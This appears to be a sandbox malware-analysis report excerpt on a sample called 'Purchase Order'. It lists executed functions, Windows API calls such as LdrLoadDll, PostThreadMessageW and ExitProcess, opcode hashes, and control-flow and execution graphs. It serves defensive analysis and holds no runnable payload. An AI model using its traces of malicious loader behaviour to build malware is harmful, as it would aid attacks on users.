                                                            • Instruction Fuzzy Hash: BC21E5B59003599FDB10CFAAD984AEEBBF9FB48310F14841AE958A3350D3789940CF60
                                                            Function 0166B2C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 144 166b2c0-166b300 145 166b302-166b305 144->145 146 166b308-166b333 GetModuleHandleW 144->146 145->146 147 166b335-166b33b 146->147 148 166b33c-166b350 146->148 147->148
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0166B326
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 8dd9c4e09c1ef7a98dd8438848eb9687591631e4bba22ef632c96e6de7503d1a
                                                            • Instruction ID: d7170acdec6fb61b567b1d3df6a5fc2cf4a9d78a5def72e71fdbfcb55c26f98a
                                                            • Opcode Fuzzy Hash: 8dd9c4e09c1ef7a98dd8438848eb9687591631e4bba22ef632c96e6de7503d1a
                                                            • Instruction Fuzzy Hash: B811FDB69003498BDB10DF9AC844A9EFBF8AB88220F10841AD918B7610C379A545CFA1
                                                            Function 015AD3D8 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1439810556.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_15ad000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b9e591f780c15440de22b359ce99b7f56381c4f05f087eda047c1f9cc0ace8f3
                                                            • Instruction ID: 8c9a42cdb691139ec8e53d5c4eb9f9dd951bca2c7238414c1de44c90ffff3af5
                                                            • Opcode Fuzzy Hash: b9e591f780c15440de22b359ce99b7f56381c4f05f087eda047c1f9cc0ace8f3
                                                            • Instruction Fuzzy Hash: 6D2100B6244304DFDB01EF44D984B5ABBB5FB88224F60C569E8090E656C37AE446CAA2
                                                            Function 015AD4C4 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1439810556.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_15ad000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb558190a5b0173c8845911ce5c81b606d7a019bceb20b254432003a36c042ff
                                                            • Instruction ID: 25f738c5970bcdba27c3c0f15cd4cc22a3e4c36d7e2bda5c41387168f9ce2722
                                                            • Opcode Fuzzy Hash: bb558190a5b0173c8845911ce5c81b606d7a019bceb20b254432003a36c042ff
                                                            • Instruction Fuzzy Hash: F0212471544200DFDB01EF54D8C0B2EBFB1FB88218F60C569E8450E656C336D406CBA2
                                                            Function 015BD01C Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1439908505.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_15bd000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 89d9593eecffc45b73e9b3fca63ab0e4c0d0cec9192a2fc5e8049f5d825e188b
                                                            • Instruction ID: 739a4fdb83a91f58fd50e9953ecbec53cb870abe448493409d0ceddc6b792365
                                                            • Opcode Fuzzy Hash: 89d9593eecffc45b73e9b3fca63ab0e4c0d0cec9192a2fc5e8049f5d825e188b
                                                            • Instruction Fuzzy Hash: 2721FF75604308DFDB15DF54D8C4B26BBB1FB88228F20C969D80A0F286D33AD406CA62
                                                            Function 015BD006 Relevance: .1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1439908505.00000000015BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_15bd000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6801dd34b181ceb01085a136f99c427aba7dadd0182a318df2a0facb277ae8c9
                                                            • Instruction ID: 7dae24e6a199c79b9e765ca44d1d5e40d8d5fe0c1cdc44d4842d3a6f6a73d8cb
                                                            • Opcode Fuzzy Hash: 6801dd34b181ceb01085a136f99c427aba7dadd0182a318df2a0facb277ae8c9
                                                            • Instruction Fuzzy Hash: F3218E755093848FCB02CF24D9D0715BF71FB46218F28C5EAD8498F2A7C33A980ACB62
                                                            Function 015AD4BF Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1439810556.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_15ad000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                            • Instruction ID: 22ddf14dd6d1a92c51fe23515915ccb323ba1ab7a6ecdb59809b551d328946c2
                                                            • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                            • Instruction Fuzzy Hash: 9E119D76544280CFCB16DF54D5C4B1ABF72FB88224F2486A9D8490B656C33AD456CBA1
                                                            Function 015AD3D3 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1439810556.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_15ad000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                            • Instruction ID: 31d4ed47d63ff913762fea95a3ccf117f774ce8a3e7d901dde05de70afc4c67d
                                                            • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                            • Instruction Fuzzy Hash: D911CD76544240CFDB02DF44D5C4B5ABF72FB84224F2482A9D8090A657C37AE456CBA1
                                                            Function 015AD731 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1439810556.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_15ad000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b4a95e316b91f27f98016788dc975c6911c24d51566bc2ee67837a508802313d
                                                            • Instruction ID: 929630a399040829341265b38d3a0ded911eeb72c597815af7ef0ddd1fa98f9a
                                                            • Opcode Fuzzy Hash: b4a95e316b91f27f98016788dc975c6911c24d51566bc2ee67837a508802313d
                                                            • Instruction Fuzzy Hash: E301F7710443849BE7146A65CCC0B6EBFE8FF81625F54C41AED084FA82C3389840C7B2
                                                            Function 015AD730 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1439810556.00000000015AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015AD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_15ad000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 494bc0deb3550c9aff584e497fe7b48a548745e9b7d66b0776c787770550e75e
                                                            • Instruction ID: 22a562e2435f8c31ca73350fe9bcfca94f7931000e1a31fce48c3b735bc7f0df
                                                            • Opcode Fuzzy Hash: 494bc0deb3550c9aff584e497fe7b48a548745e9b7d66b0776c787770550e75e
                                                            • Instruction Fuzzy Hash: C3F0C2320043849EE7149A19C884B6AFFE8EB81734F28C45AED084F682C278A840CBB1

                                                            Non-executed Functions

                                                            Function 0166DF14 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440221414.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1660000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e5375db2cad5b06ed6ec170b671010027ca4551422de3e2f33239053adbc49b6
                                                            • Instruction ID: ec864a2d127cb488ce053c1182ad40873acc39a6651c6164651766ad7ae5bd57
                                                            • Opcode Fuzzy Hash: e5375db2cad5b06ed6ec170b671010027ca4551422de3e2f33239053adbc49b6
                                                            • Instruction Fuzzy Hash: 0AA17F32F002168FCF15DFB9DC5059EBBB6FF84300B1545AAE905AB265DB71E915CB80

                                                            Execution Graph

                                                            Execution Coverage:1.3%
                                                            Dynamic/Decrypted Code Coverage:5.1%
                                                            Signature Coverage:8%
                                                            Total number of Nodes:138
                                                            Total number of Limit Nodes:8
                                                            execution_graph 92346 424ce3 92351 424cfc 92346->92351 92347 424d8c 92348 424d47 92354 42e743 92348->92354 92351->92347 92351->92348 92352 424d87 92351->92352 92353 42e743 RtlFreeHeap 92352->92353 92353->92347 92357 42c9e3 92354->92357 92356 424d57 92358 42c9fd 92357->92358 92359 42ca0e RtlFreeHeap 92358->92359 92359->92356 92360 42f7e3 92361 42f7f3 92360->92361 92362 42f7f9 92360->92362 92365 42e823 92362->92365 92364 42f81f 92368 42c993 92365->92368 92367 42e83e 92367->92364 92369 42c9ad 92368->92369 92370 42c9be RtlAllocateHeap 92369->92370 92370->92367 92478 424953 92479 42496f 92478->92479 92480 424997 92479->92480 92481 4249ab 92479->92481 92483 42c663 NtClose 92480->92483 92482 42c663 NtClose 92481->92482 92484 4249b4 92482->92484 92485 4249a0 92483->92485 92488 42e863 RtlAllocateHeap 92484->92488 92487 4249bf 92488->92487 92489 42bc73 92490 42bc90 92489->92490 92493 18a2df0 LdrInitializeThunk 92490->92493 92491 42bcb8 92493->92491 92371 41b223 92372 41b267 92371->92372 92373 41b288 92372->92373 92375 42c663 92372->92375 92376 42c67d 92375->92376 92377 42c68e NtClose 92376->92377 92377->92373 92378 413ca3 92379 413cc9 92378->92379 92381 413cf3 92379->92381 92382 413a23 92379->92382 92383 413a3f 92382->92383 92386 42c903 92383->92386 92387 42c91d 92386->92387 92390 18a2c70 LdrInitializeThunk 92387->92390 92388 413a45 92388->92381 92390->92388 92494 41a4d3 92495 41a542 92494->92495 92496 41a4e8 92494->92496 92496->92495 92498 41e433 92496->92498 92499 41e459 92498->92499 92503 41e54d 92499->92503 92504 42f913 92499->92504 92501 41e4ee 92502 42bcc3 LdrInitializeThunk 92501->92502 92501->92503 92502->92503 92503->92495 92505 42f883 92504->92505 92506 42e823 RtlAllocateHeap 92505->92506 92508 42f8e0 92505->92508 92507 42f8bd 92506->92507 92509 42e743 RtlFreeHeap 92507->92509 92508->92501 92509->92508 92510 413f93 92511 413fad 92510->92511 92513 413fcb 92511->92513 92516 417723 92511->92516 92514 414010 92513->92514 92515 413fff PostThreadMessageW 92513->92515 92515->92514 92517 417747 92516->92517 92518 417783 LdrLoadDll 92517->92518 92519 41774e 92517->92519 92518->92519 92519->92513 92391 401b04 92392 401b19 92391->92392 92395 42fcb3 92392->92395 92398 42e2f3 92395->92398 92399 42e319 92398->92399 92410 4072e3 92399->92410 92401 42e32f 92409 401c17 92401->92409 92413 41b033 92401->92413 92403 42e34e 92406 42e363 92403->92406 92428 42ca33 92403->92428 92424 428203 92406->92424 92407 42e37d 92408 42ca33 ExitProcess 92407->92408 92408->92409 92411 4072f0 92410->92411 92431 4163e3 92410->92431 92411->92401 92414 41b05f 92413->92414 92449 41af23 92414->92449 92417 41b08c 92418 41b097 92417->92418 92421 42c663 NtClose 92417->92421 92418->92403 92419 41b0c0 92419->92403 92420 41b0a4 92420->92419 92422 42c663 NtClose 92420->92422 92421->92418 92423 41b0b6 92422->92423 92423->92403 92425 428265 92424->92425 92427 428272 92425->92427 92460 418583 92425->92460 92427->92407 92429 42ca4d 92428->92429 92430 42ca5e ExitProcess 92429->92430 92430->92406 92432 416400 92431->92432 92434 416419 92432->92434 92435 42d0d3 92432->92435 92434->92411 92437 42d0ed 92435->92437 92436 42d11c 92436->92434 92437->92436 92442 42bcc3 92437->92442 92440 42e743 RtlFreeHeap 92441 42d195 92440->92441 92441->92434 92443 42bce0 92442->92443 92446 18a2c0a 92443->92446 92444 42bd0c 92444->92440 92447 18a2c1f LdrInitializeThunk 92446->92447 92448 18a2c11 92446->92448 92447->92444 92448->92444 92450 41af3d 92449->92450 92454 41b019 92449->92454 92455 42bd63 92450->92455 92453 42c663 NtClose 92453->92454 92454->92417 92454->92420 92456 42bd80 92455->92456 92459 18a35c0 LdrInitializeThunk 92456->92459 92457 41b00d 92457->92453 92459->92457 92461 4185ad 92460->92461 92467 418aab 92461->92467 92468 413c03 92461->92468 92463 4186da 92464 42e743 RtlFreeHeap 92463->92464 92463->92467 92465 4186f2 92464->92465 92466 42ca33 ExitProcess 92465->92466 92465->92467 92466->92467 92467->92427 92472 413c23 92468->92472 92470 413c8c 92470->92463 92471 413c82 92471->92463 92472->92470 92473 41b343 RtlFreeHeap LdrInitializeThunk 92472->92473 92473->92471 92474 418cc8 92475 42c663 NtClose 92474->92475 92476 418cd2 92475->92476 92477 18a2b60 LdrInitializeThunk

                                                            Executed Functions

                                                            Function 00417723 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 356 417723-41774c call 42f323 359 417752-417760 call 42f923 356->359 360 41774e-417751 356->360 363 417770-417781 call 42ddc3 359->363 364 417762-41776d call 42fbc3 359->364 369 417783-417797 LdrLoadDll 363->369 370 41779a-41779d 363->370 364->363 369->370
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417795
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                            • Instruction ID: c8367a89be375ba73a30cdb688ded44f01425706de2ca614d69ed47fcf1ac29a
                                                            • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                            • Instruction Fuzzy Hash: 49010CB5E00209BBDB10DBE5DC42FDEB7789B54308F4041AAA91897281FA35EB588B95
                                                            Function 0042C663 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 376 42c663-42c69c call 404783 call 42d8c3 NtClose
                                                            APIs
                                                            • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                            • Instruction ID: 55d98cbac179b72a764dd86cd5ec1f11a461976065f381c4f300eafe1b6f3ecb
                                                            • Opcode Fuzzy Hash: 6a676e2e009e07708bbe963b130a833cbfc46acaa7b4dc646f7534d15dcc5b9e
                                                            • Instruction Fuzzy Hash: E8E086326402147BD210FB6ADC41FD7776CDFC5714F00451AFA1867242C6757A1587F5
                                                            Function 018A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 390 18a2b60-18a2b6c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ac4491c87aeb6f8064f7327b81f317d5a38c56fee2231f9be21d3b0f38627fbb
                                                            • Instruction ID: 3b85241cecb80621df7b3796b99abaca6bc6a484eea2c756a01cfa445492cfea
                                                            • Opcode Fuzzy Hash: ac4491c87aeb6f8064f7327b81f317d5a38c56fee2231f9be21d3b0f38627fbb
                                                            • Instruction Fuzzy Hash: FF90026120240007410571584854656400E97E1301B55D021E20195A0DC5258A996626
                                                            Function 018A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b4df249603d58f4c736b87e5000de2278b833fa1d8f8864bbb239cf8b2ea3a37
                                                            • Instruction ID: 89399dd77b01d1a2ed3287ca3b68f0d41036dc7a837a45b958329c49afcd58ca
                                                            • Opcode Fuzzy Hash: b4df249603d58f4c736b87e5000de2278b833fa1d8f8864bbb239cf8b2ea3a37
                                                            • Instruction Fuzzy Hash: 8A90023120140417D11171584944747000D97D1341F95D412A1429568DD6568B5AA622
                                                            Function 018A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 391 18a2c70-18a2c7c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: b291961c31e23fb53547dce9cadc69a4776644cc0a59da690217e939024793f6
                                                            • Instruction ID: 4e8744d45e29dc7718866da75bbb5a539dced16293bf287aebbfc5625fab11f2
                                                            • Opcode Fuzzy Hash: b291961c31e23fb53547dce9cadc69a4776644cc0a59da690217e939024793f6
                                                            • Instruction Fuzzy Hash: 6290023120148806D1107158884478A000997D1301F59D411A5429668DC6958A997622
                                                            Function 018A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 809a2e628f88572af1226956f202b1efcaa5c2d9b4f759fe49f19a96f65bfdfa
                                                            • Instruction ID: 524aa147dd48ff081a0707201e509533c43b346d61abf177f1a5ea88d7d72532
                                                            • Opcode Fuzzy Hash: 809a2e628f88572af1226956f202b1efcaa5c2d9b4f759fe49f19a96f65bfdfa
                                                            • Instruction Fuzzy Hash: 8690023160550406D10071584954746100997D1301F65D411A1429578DC7958B596AA3
                                                            Function 00413F8F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: S$l420377x$l420377x
                                                            • API String ID: 1836367815-2727433438
                                                            • Opcode ID: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                            • Instruction ID: c2806ac613a218a9f43bc075071cdee210e11ad5ac0fb3b5002561ad8e7d22f2
                                                            • Opcode Fuzzy Hash: 359c6fffe9613725b5ac8c672145e67f63efc52315c8541c79e7ad6c697c6183
                                                            • Instruction Fuzzy Hash: 43114C71D0015C7AEB10AAE69C81DEF7B7CDF4579CF448069FA0467141D27C8E064BB5
                                                            Function 00413F93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 15 413f93-413fc5 call 42e7e3 call 42f1f3 20 413fcb-413ffd call 404733 call 424e23 15->20 21 413fc6 call 417723 15->21 26 41401d-414023 20->26 27 413fff-41400e PostThreadMessageW 20->27 21->20 27->26 28 414010-41401a 27->28 28->26
                                                            APIs
                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: l420377x$l420377x
                                                            • API String ID: 1836367815-444879537
                                                            • Opcode ID: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                            • Instruction ID: 33197e0a7dcb6eb663e71045ce9ebb9a0ec692f75d002f1c99a84e6dd662f6bc
                                                            • Opcode Fuzzy Hash: c759df97fc8d8bd9950daa468166aab63e6b13b68f94bc1cf4dd968c4ef8860b
                                                            • Instruction Fuzzy Hash: 4A0126B2D0025C7AEB10AAE69C81DEFBB7CDF44798F408069FA0467141D67C9E064BB5
                                                            Function 00413F72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55threadwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 29 413f72-413f79 30 413fb5-413ffd call 417723 call 404733 call 424e23 29->30 31 413f7b-413f87 29->31 38 41401d-414023 30->38 39 413fff-41400e PostThreadMessageW 30->39 39->38 40 414010-41401a 39->40 40->38
                                                            APIs
                                                            • PostThreadMessageW.USER32(l420377x,00000111,00000000,00000000), ref: 0041400A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: l420377x$l420377x
                                                            • API String ID: 1836367815-444879537
                                                            • Opcode ID: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                            • Instruction ID: 07d8ccd72df32b7def514bcf1009cf5c80a90bfc08a7e37c420c6dc4dd04ca91
                                                            • Opcode Fuzzy Hash: 3262b01b000be0360b63c840c83d9d807fb3e09adfdf533a4899f21b81f85822
                                                            • Instruction Fuzzy Hash: 5D0140B3E0005876D7105EA55CC1CEFBB7CDE84754F4040ABFA0497201E66E4E024BA5
                                                            Function 0042C9E3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 41 42c9e3-42ca24 call 404783 call 42d8c3 RtlFreeHeap
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CA1F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: wdA
                                                            • API String ID: 3298025750-2931128418
                                                            • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                            • Instruction ID: 9a34639f9b590f445554bb3374e68085bc2f8b1a53e3d8f22fb1199bbd37af40
                                                            • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                            • Instruction Fuzzy Hash: E6E06D72604205BBD614EF59EC85FAB37ADDFC9714F004419FE18A7242C671B9118AB8
                                                            Function 0042C993 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 371 42c993-42c9d4 call 404783 call 42d8c3 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,0041E4EE,?,?,00000000,?,0041E4EE,?,?,?), ref: 0042C9CF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                            • Instruction ID: 36e320101d405b986edb5f0360d5375c690b058552b8fab17163e86361dfcef2
                                                            • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                            • Instruction Fuzzy Hash: D6E06DB2604204BBD714EE99EC41EAB77ACDFC5750F004419FD18A7282D671B9108BB9
                                                            Function 0042CA33 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 381 42ca33-42ca6c call 404783 call 42d8c3 ExitProcess
                                                            APIs
                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,5B435AB9,?,?,5B435AB9), ref: 0042CA67
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1834862931.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Purchase Order.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                            • Instruction ID: e0f95e071271af0ef5bae3a3abc99ff131e4bcb123f1ba6cdcf3cfbd638433f3
                                                            • Opcode Fuzzy Hash: 898f235de1112ca79113d7bdd050537dfc5d7c103be820d62ecc6fe10eccdd2d
                                                            • Instruction Fuzzy Hash: 4CE04F766002187BD220AA9AEC41F97775CDFC9714F50441AFA1867182C6717A1586A4
                                                            Function 018A2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 386 18a2c0a-18a2c0f 387 18a2c1f-18a2c26 LdrInitializeThunk 386->387 388 18a2c11-18a2c18 386->388
                                                            APIs
                                                            Memory Dump Source
